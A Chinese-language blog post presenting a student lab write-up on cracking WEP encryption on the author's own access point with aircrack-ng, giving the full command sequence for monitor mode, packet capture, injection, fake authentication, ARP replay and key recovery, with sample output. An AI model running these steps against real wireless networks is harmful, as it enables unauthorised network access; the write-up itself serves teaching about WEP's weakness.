close

內容為作者在學期間。某一次作業內容。

這邊僅作為實驗分享,不可以拿去進行任何真實攻擊。

如發生任何法律與金錢層面的問題,後果將由執行者全數承擔。

 



1.搜尋合適的WEP破解軟體,安裝並學習如何操作。
 


(建議軟體:aircrack-ng http://www.aircrack-ng.org/doku.php


 

2. 可透過iwlistkismet得知AP ChannelMAC address


 

3. 需有一台採用WEP加密的AP,一台Station破解。


-WEP加密的AP採用:


TOTO-LINK N200RE(
支援WEPWPAWPA2)


-Station

採用
:Ubuntu 14.04

 

4.建立的AP 必須可以連至外部網路(因為不是合法使用者,


所以需要讓網路環境有其他成員可以跟這個
AP溝通,


才能擷取到
ARP封包)


安裝aircrack-ng服務


#sudo apt-get install aircrack-ng


先看一下網卡狀況

#sudo iwconfig

 


先停用網卡wlan1moniter模式


#sudo airmon-ng stop wlan1


看一下停用後的狀態
 

#sudo iwconfig

 

然後開啟網卡wlan1moniter模式


#sudo airmon-ng start wlan1


啟用wlan後,查看ifconfig,會多一個mon0


#ifconfig

mon0指定到channel 8當中 (8 代表 channel 8)

 

#sudo airmon-ng start mon0 8

 


找尋目前位置的所有AP站台,可以找到這次無線AP目標(ccu_test)


#sudo airodump-ng mon0


鎖定目標為目前的AP(ccu_test)


MAC位址為(B8:55:10:2E:7E:D8),圖中也顯示其頻道為ch 8



 

 

開始針對剛剛找到的ccu_test進行注入(injection)
 

也是要看你的網卡能不能成功對這個AP進行注入(injection)的行為。
 

如果最下面是 0%,可能是你距離AP太遠,沒有把法順利的進行injection
 

如果最下面是100%,僅是表示有相當高的機會進行injeciton
 

實驗數據會根據你的距離遠近而改變。
 

B8:55:10:2E:7E:D8 為 無線APMac address位置。
 

#sudo aireplay-ng -9 –e ccu_test –a B8:55:10:2E:7E:D8 mon0

 


開啟封包蒐集,捕捉生成的IV


#sudo airodump-ng –c 8 --bssid B8:55:10:2E:7E:D8 –w output mon0

 

 

channel 指定 8 BSSID MAC位址(AP的位址) B8:55:10:2E:7E:D8


將蒐集到的封包資訊全部匯入output檔當中


一開始都是空白的,當開始進行aireplay時就會有資訊出現。



 

檢查現在mon狀況
 

#sudo tcpdump -n -e –s0 –vvv –I mon


如果做LAB環境無線AP太多,可以運用 grep 指令去篩選。

 

 

可以看到mon接收到的封包
 

BSSID: B8:55:10:2E:7E:D8 (無線AP)


DA: FF:FF:FF:FF:FF:FF (正在廣撥)


SA: B8:55:10:2E:7E:D8 (無線AP)

 

 

製作一個Fack authentication(假的認證&接入點)


讓使用者連接後會至此驗證。


#aireplay-ng -1 0 –e ccu_test –a B8:55:10:2E:7E:D8 –h 9C-D6-43-00-F5-0A mon0


 

這邊開始偵聽ARP的請求,然後重新注入回他們的網路模式,


偵聽是因為AP通常會轉播他們新生成的IV值,所以這是我們大量獲得IV值的管道。


#sudo aireplay-ng -3 –b B8:55:10:2E:7E:D8 -h 9C-D6-43-00-F5-0A mon0


無線APMAC:B8:55:10:2E:7E:D8


StationMAC: 9C-D6-43-00-F5-0A


這邊在不要中斷他,讓他持續接收資訊。


如果取到的got ARP值一值是0


請將station斷開ccu_test再重新連接,數據即會出現。

 

 

我們同時可以看到另一邊在蒐集封包(IV數值)terminal,數值開始有反應。

 

開始針對先前蒐集到的封包資訊(IV)WEP的密鑰的破解
 

#sudo aircrack-ng –b B8:55:10:2E:7E:D8 output-*.cap


B8:55:10:2E:7E:D8 為無線APMAC


output-*.cap 為蒐集到封包資訊檔案,因為有數個,所以以*萬用字元表示。


這是運行時IV值取得到3523 還無法破解出WEP密碼


所以下方顯示【Failed. Next try with 5000 IVs.


IV值取得到5097仍無法,將繼續向下
 

Failed. Next try with 10000 IVs.



IV值取得到10182仍無法,所以繼續向下


Failed. Next try with 15000 IVs.

 

 


IV值取到19550時,破解出無線APWEP密碼


KEY FOUND ! …..(ASCII:ccuap)


可以得知這台無線AP密碼為ccuap



到這邊,WEP的無線加密就破解完成了。

破解時間其實很快,這也是大家現在不用WEP加密的原因之一。

<本篇完>

 

 

arrow
arrow
    全站熱搜

    IT001 發表在 痞客邦 留言(0) 人氣()